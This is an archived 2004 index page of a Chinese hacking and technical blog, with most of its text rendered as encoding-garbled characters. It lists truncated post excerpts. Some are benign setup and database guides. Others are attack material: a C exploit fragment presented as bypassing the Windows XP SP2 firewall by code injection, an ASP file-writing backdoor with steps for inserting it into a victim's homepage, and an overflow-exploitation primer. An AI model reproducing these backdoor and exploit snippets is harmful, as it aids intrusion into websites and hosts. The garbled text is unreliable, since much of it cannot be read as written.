¡º¹Â¹â½£Òş¡»

来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=42149&m=20041016 存档链接: https://web.archive.org/web/20041125200344id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=42149&m=20041016

2004 Äê 10 ÔÂ Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ¡º¹Â¹â½£Òş¡» ¡ù ¼¼ÊõÊÇÒ»ÖÖË¼Ïë ¡ù¡¡¡¡¡¡¡¡

¡ù ¸ßÊÖÊÇÒ»ÖÖ¾³½ç ¡ù¡¡¡¡¡¡¡¡

¡ù ºÚ¿ÍÊÇÒ»ÖÖ¾«Éñ ¡ù¡¡¡¡¡¡¡¡ ¹ØÓÚRecordset³Ö¾ÃĞÔµÄÒ»µãµãÑĞ¾¿ ASPĞ¡Íµ(Ô¶³ÌÊı¾İ»ñÈ¡)³ÌĞòµÄÈëÃÅ½Ì³Ì ¶Ô¡¶µçÄÔ°®ºÃÕß¡·µÚ22ÆÚ¡¶¡°É±¡±³öÀ´µÄ²¡¶¾¡·Ò»ÎÄµÄÖÊÒÉ ´Ó±à³Ì½Ç¶È·ÖÎö´«ÆæÄ¾Âí DISCUZÂ©¶´ÓëÌáÉıÈ¨ÏŞ ÔÚASPÖĞÊµÏÖÒ³ÃæÓëÊı¾İ¿âÁ¬½ÓµÄ¼¸ÖÖÊµÓÃ·½·¨ PHPÔÚ°²È«·½ÃæµÄÁíÀàÓ¦ÓÃ JSP°²È«ĞÔ³õÌ½ »ùÓÚphp+MysqlµÄSQL Injection ¹¥»÷¼¼Êõ ËêÔÂÁªÃËµÄÊÍÒâ ¼ÅÄ¯Í¿Ñ» : ÔõÃ´ÏÖÔÚµÄÅ®º¢×Ó. sunlion[E.S.T] : XĞÖµÜµ½´ËÒ»ÓÎ£¬º. º©¹· : ĞÖµÜ£¬°²È«·½ÃæµÄ. taynni : hoho,Ö§³Ö!!!µ½Ê±. flyweb : ²»´í¹ş×ö¸öÁ´½. dir : ÊÇµÄ°¡£¡ . dir : Å¼ÊÇÒ»ÑùµÄ°¡£¡°Ö. imin : À÷º¦°¡£¡ . ¶şÃ× : ÕâÃ´ºÃµÄµØ·½£¬Ö§. lichdr : »èÑ½£¬ÎÒ²»ÊÇÊ²üN. [ ´æ µµ ] andy dreamtheater Angel showlife tx7do charcs chensun netsky xhacker jpxiong Flier lgx KKQQ Ziqi redsaga spy88B8 Luzhu NetKnave eVan SUNU Taynni wuhui CAT Neeao Iceberg kaspersky KusTa Hoky eviloctal lam Net¡¤PoliCe Jace Hardy Gusu¡¤Lanye lilo xiaolu knIfe mifor kaka Lo7e4L Super¡¤Hei lichdr yysun testnet soul Archonwang lamp FlyWeb evilhsu f2s hackfree powers Sunlion EvilPhive xeric icyfoxlovelace GuoMing swords | Ê×Ò³ | ¼¼ÊõÎÄÏ×(730) | ÒµÄÚ¹«¸æ(30) | ·ÖÒ³ ³£¼ûÍøÒ³¼ÓÃÜ·½·¨ºÍÆÆ½â¶Ô²ß

[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ÓÒ¼üµ¯³ö´°¿Ú¼ÓÃÜ¡£³ÌĞòÈçÏÂ£º ´Ë·¨¶ÔIEÓĞÌØĞ§£¬µ«ÔÚNCÖĞÓÒ¼ü¶¨ÒåÎªÎŞ·¨¿ØÖÆµÄ°ïÖú²Ëµ¥£¬ËùÒÔNCÖĞevent¶ÔÏóÎŞbuttonÊôĞÔ£¬ÔÚNCÖĞÓÒ¼ü- &.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ DNSÔÚ²Ù×÷ÏµÍ³ÖĞµÄ¼òµ¥ÅäÖÃ
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ÏÈÔÚÓ²ÅÌ½¨Á¢ÓòºÍĞéÄâÖ÷»úµÄÊµ¼ÊÄ¿Â¼£¬½¨Á¢ÒÔÏÂÈı¸öÊµ¼ÊÄ¿Â¼£º c: \ inetpub\ wwwroot\ myweb c: \ inetpub\ wwwroot\ aaa c: \ inetpub\ wwwroot\ bbb ½¨Á¢ÓòºÍĞéÄâÖ÷»ú 1£®ÔÚNTÖĞ£¬ÔËĞĞ²Ëµ¥ÖĞNT4 Option PackÏÂMicrosoft Internet Information ServerÖĞµÄInternet Service Manager£» 2£®ÓÃÓÒ¼üµ¥»÷±¾¼ÆËã»úÃû£¬ÔÚµ¯³ö²Ëµ¥ÖĞÑ¡Ôñ¡°ĞÂ½¨¡±ÖĞµÄ¡°web Site¡±£»3£®ÔÚÕ¾µãËµÃ÷ÖĞ¼üÈë.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ QQÔ´´úÂë
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ;@echo off;goto compile ;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::;; QQ_Plugins.dll Ô´´úÂë;;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::.586.model flat, stdcalloption casemap :none ; case sensitive;::::::::::::.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ HTMLÔÚÏß±à¼Æ÷µÄµ÷ÓÃ·½·¨
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 HTMLÔÚÏß±à¼Æ÷²»ĞèÒª¶®µÃÊ¹ÓÃDreamweaver£¬»áÓÃWord¾Í»áÊ¹ÓÃ´Ë±à¼Æ÷£¬ÔÚÎÄÕÂÏµÍ³»òÕßÊÇĞÂÎÅÏµÍ³ĞèÒªÎÄ×Ö±à¼µÄweb³ÌĞòÖĞ·Ç³£ÊµÓÃ¡£µ«ÊÇÈçºÎ½«html±à¼Æ÷Ç¶Èëµ½webÒ³ÖĞºÍÔõÃ´È¡µÃÀïÃæµÄÊı¾İÄØ£¿£¡Ê×ÏÈÎÒÃÇ¼Ù¶¨ÎÒÃÇËùÒªµ÷ÓÃµÃHTMLÔÚÏß±à¼Æ÷·ÅÔÚÒ»¸öµ¥¶ÀµÃÒ³ÃæÖĞ£¬ÎÄ¼şÃûÊÇgledit.htmÉÏ´«Í¼Æ¬µÄÇ°Ì¨Ò³Ãæ£ºhttp://www.jfinfo.com/room/admin/img_upload.as.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ÈÆ¹ıXP SP2·À»ğÇ½µÄ´úÂë
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 Exploit:#include <windows.h>#include <winsock.h>#include <stdlib.h>#include <stdio.h>#include <winsock.h> void setfp(char buffer,int sz,DWORD from,DWORD fp){int i;for(i=0;i<sz-5;i++)if (buffer[i]=='\xb8'&&(DWORD*)(buffer+i+1)==from){(DWORD)(buffer+i+1)=fp;break;}} int injcode(char *buffer.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ »ñÈ¡SQL Server°æ±¾(Ô´´úÂë)
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 http://www.sqlsecurity.com/µÄChip Andrews·¢²¼µÄSQL ver£¬ÔÀ´ÊÇÓÃC#Ğ´µÄ£¬Å¼ÉÔÉÔ×÷ÁËÏÂĞŞ¸Ä£¬Ë³±ãÑ§Ï°Ò»ÏÂUnixÏÂSocket±à³Ì¡££º££© ±àÒë»·¾³£ºFreeBSD 5.2 (i386) £¨win32µÄ³ÌĞò¿ÉÒÔÔÚÕâÀïÏÂÔØhttp://www.xfocus.net/tools/200408/795.html£© #include #include in.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ·ÀÖ¹ACCESSÊı¾İ¿â±»ÏÂÔØµÄ9ÖÖ·½·¨
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ÆªÊ×Óï£ºÔÀ´¸ÄmdbÎªasp¾ÍÄÜ·ÀÏÂÔØÊÇ¹í»°¡£ Òı×Ó£º×òÌìºÍanimatorÊÔÑéÁËÒ»ÏÂ£¬°Ñdata.mdbÎÄ¼ş¸ÄÃûÎªdata.aspÎÄ¼şºó·ÅÔÚwwwrootÄ¿Â¼Àï¡£È»ºó ÔÚIEÖĞÊäÈëdata.aspÂ·¾¶ºó£¬·¢ÏÖIEÏÔÊ¾Ò»Æ¬¿Õ°×£¬ÓÒ¼ü->²ì¿´Ô´ÎÄ¼ş£¬Ìø³ö¼ÇÊÂ±¾£¬½«ÄÚÈİÁí´æÎª.mdbÎÄ¼ş £¬ÓÃACCESS´ò¿ª£¬·¢ÏÖĞèÒªÃÜÂë£¬Ò²¾ÍÊÇËµÖÁÉÙÎÄ¼şÍ·±»ÆÆ»µ¡£ È»ºóÓÃFlashgetÊÔÑéÏÂÔØdata.aspÎÄ¼ş£¬²¢Áí´æÎªdata.mdbÎÄ¼ş£¬·¢ÏÖÓÃACCESS´ò¿ªÍêºÃÎŞËğ£¡.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ²åÈëÊ½ÃâÉ±ºóÃÅ-½«ºóÃÅ·Åµ½¶Ô·½Ö÷Ò³Àï
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 1.Ëæ±ãÕÒËûÒ»¸öÒ³Ãæ£¬È»ºó°ÑÈçÏÂÄÚÈİ·Ö¿ª²åÈëµ½ËüµÄÖ÷Ò³ÁË£¬×¢ÒâÒ»ÏÂÉÏÏÂÎÄ¡£ÄÚÈİ£¨fso): <% dim objFSO %><% dim fdata %><% dim objCountFile %><% on error resume next %><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><% if Trim(request("syfdpath"))<>"" then %><% fdata = request("cyfddata") %>.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ system()ÔÚÒç³öÖĞµÄÀûÓÃ
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ½ü¼¸ÄêÀ´£¬¼ÆËã»úÏµÍ³ÔÚÔöÇ¿°²È«ĞÔÉÏÓĞÁËºÜ´óµÄ·¢Õ¹£¬Ò»Ğ©ÔöÇ¿ĞÍµÄÄÚºË²¹¶¡Ö®Àà£®ºÜºÃµØ·À·¶ÁËÒç³öµÄ±»ÀûÓÃ£¬Ôì³ÉĞ´exploitµÄÄÑ¶È´ó´óÔö¼ÓÁË£®ExploitµÄ¼¼ÊõÒ²Ïà¶Ô²»¶Ï·¢Õ¹ÆäÖĞret-into-libc¼¼Êõ¿ÉÒÔºÜºÃµØ±Ü¿ªÄ³Ğ©ÏŞÖÆ£¬ÓÖÊÇĞ´exploitµÄÒ»ÌõÂŞÂí´óµÀ£® ¶Ô±È¡ªÏÂ²ÛÍ³µÄÒç³öÀûÓÃ·½Ê½,expoit¹¹½¨Ò»¸öbuf,¸²¸ÇÁËnetµØÖ·È»ºóÌø×ªµ½ÓĞÒ»´ó´®NOPµÄÄÚ´æÄ³´¦£¬ÓÉÓÚNOPµÄÃî´¦NOPºóÃæµÄshellcod.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ASP¶ÔÊı¾İ¿â²Ù×÷µÄµäĞÍ²½Öè¼òÃ÷½Ì³Ì
[¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 <% 1 set cn=server.createobject("adodb.connection") '´´½¨Á¬½ÓÊı¾İ¿âËùÒªÓÃµ½µÄ¶ÔÏó cn 2 cn.open "...con_str..." 'µ÷ÓÃcnµÄopen·½·¨£¬²¢ÇÒÒÔË«ÒıºÅÖĞ¼äµÄ×Ö·û´®Îª²ÎÊı£¬´ò¿ªÊı¾İ¿â£¨¶ÔÊı¾İ¿â²Ù×÷Ö®Ç°ĞèÒª´ò¿ª£¬²Ù×÷ÍêÖ®ºóĞèÒª¹Ø±Õ¼´µ÷ÓÃcnµÄclose·½·¨£©¡£Ò²¿ÉÒÔÑ¡ÔñÓÃÏµÍ³»òÓÃ»§Êı¾İÔ´£¬µ«²»ÍÆ¼ö£¬ÒòÎªºÜ¶àÊ±ºòÃ»ÓĞ¶ÔĞéÄâÖ÷»úµÄ²Ù×÷È¨ÏŞ£¬ËùÒÔ¶àÊ¹ÓÃÁ¬½Ó×Ö·û´®¡£.............. ÔÄ¶ÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ·ÖÒ³ Ä£°åÉè¼Æ£º èóÃÎñöĞÄ